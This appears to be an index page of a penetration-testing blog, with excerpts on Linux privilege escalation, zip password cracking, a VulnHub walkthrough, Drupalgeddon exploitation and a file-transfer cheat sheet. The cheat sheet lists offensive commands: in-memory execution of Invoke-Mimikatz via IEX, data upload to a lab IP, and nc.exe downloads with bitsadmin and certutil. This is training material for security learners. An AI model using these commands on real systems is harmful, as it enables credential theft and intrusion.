LINUX 101

Views: 8Linux File System Path Description / The top-level directory is the root filesystem and contains all of the files required to boot the operating system before other filesystems are mounted as well as the files required to boot the other filesystems. After boot, all of the other filesystems are mounted at standard mount points … Read more

Linux Privilege Escalation

Views: 9LinPEAS Latest Releases: Release Release refs/heads/master 20230425-bd7331ea · carlospolop/PEASS-ng · GitHub Privilege Escalation: SUID Finding SUID Binaries Use the command: “find / -perm -u=s -type f 2>/dev/null” to search the file system for SUID/GUID files. Let’s break down this command. find – Initiates the “find” command / – Searches the whole file system -perm – searches for files with … Read more

How to crack zip password on KALI linux

Views: 16Fcrackzip is a fast password cracker partly written in assembler. It is able to crack password protected zip files with brute force or dictionary based attacks, optionally testing with unzip its results. It can also crack cpmask’ed images. Install fcrackzip fcrackzip options Usage Example

VulnHub OS-bytesec: Walkthrough

Views: 50Enumeration Nmap scan Nikto scan SMB enumeration Users found, S-1-22-1-1000 Unix User\sagar (Local User)S-1-22-1-1001 Unix User\blackjax (Local User)S-1-22-1-1002 Unix User\smb (Local User) ‘smb’ account is configured without a password. Connect to the share as ‘smb’ and enumerate the share. Found a zip file named as ‘safe.zip’. Downloaded the file to local machine and found … Read more

Attacking Drupal

Views: 37Leveraging Known Vulnerabilities Over the years, Drupal core has suffered from a few serious remote code execution vulnerabilities, each dubbed Drupalgeddon. At the time of writing, there are 3 Drupalgeddon vulnerabilities in existence. Drupalgeddon Manual exploitation As stated previously, this flaw can be exploited by leveraging a pre-authentication SQL injection which can be used to … Read more

FILE TRANSFER – Cheat Sheet

Views: 11 Command Description  Invoke-WebRequest https://<snip>/PowerView.ps1 -OutFile PowerView.ps1 Download a file with PowerShell IEX (New-Object Net.WebClient).DownloadString(‘https://<snip>/Invoke-Mimikatz.ps1’) Execute a file in memory using PowerShell Invoke-WebRequest -Uri http://10.10.10.1:443 -Method POST -Body $b64 Upload a file with PowerShell bitsadmin /transfer n http://10.10.10.1/nc.exe C:\Temp\nc.exe Download a file using Bitsadmin certutil.exe -verifyctl -split -f http://10.10.10.1/nc.exe Download a file using Certutil … Read more